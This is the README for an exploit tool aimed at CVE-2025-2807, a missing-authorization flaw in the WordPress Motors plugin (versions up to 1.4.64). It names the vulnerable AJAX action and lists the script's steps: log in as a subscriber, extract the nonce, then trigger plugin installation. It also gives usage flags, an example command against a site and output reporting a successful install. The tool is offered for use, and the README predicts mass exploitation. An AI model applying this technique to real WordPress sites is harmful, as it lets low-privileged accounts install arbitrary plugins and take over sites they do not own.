
# CVE-2025-2807: Motors Plugin <= 1.4.64 - Arbitrary Plugin Installation Vulnerability

> **Exploit By:** Nxploited | Khaled Alenazi

---

## ⚠️ Vulnerability Summary

**Plugin:** Motors (<= 1.4.64)  
**Type:** Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation  
**Severity:** 8.8 (CVSS v3)  
**Discovered On:** 07 April 2025  
**VDP:** No

---

## 🔥 Exploit Impact

This vulnerability allows any **authenticated WordPress user (Subscriber+)** to install arbitrary plugins **without any proper authorization check**. 

Due to the lack of capability validation in the `mvl_setup_wizard_install_plugin` function, a low-privileged user can perform actions reserved for administrators.

> 📅 Expected to be mass-exploited due to its simplicity and critical impact.

---

## 🚫 Technical Details

- Vulnerable Endpoint: `/wp-admin/admin-ajax.php`
- Vulnerable Action: `mvl_setup_wizard_install_plugin`
- Access Level Required: **Subscriber+** (logged-in user)
- Core Issue: Missing `current_user_can('install_plugins')` or similar capability check


---

## 🚀 Exploit Script (Python)
This script:
1. Logs in as a subscriber
2. Extracts the required nonce (from HTML or JS)
3. Triggers the vulnerable AJAX call to install a plugin of your choice

---

## 📃 Usage
```bash
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]

Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME     Subscriber username
  -p, --password PASSWORD      Subscriber password
  -pn, --plugin PLUGIN         Plugin to install (default: contact-form-7)
```

---

## 🐞 Example Execution
```bash
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7
```

### Output:
```
[*] Logging in...
[+] Logged in successfully.
[*] Fetching setup wizard page...
[+] Found nonce in HTML: 428cdf8347
[*] Attempting to install plugin: contact-form-7
[+] Plugin installation request sent successfully!
[+] Response: {"success":true,"data":"Plugin succesfully activated"}
```

---



---

  
## ✨ Exploit by **Nxploited** (Khaled Alenazi)
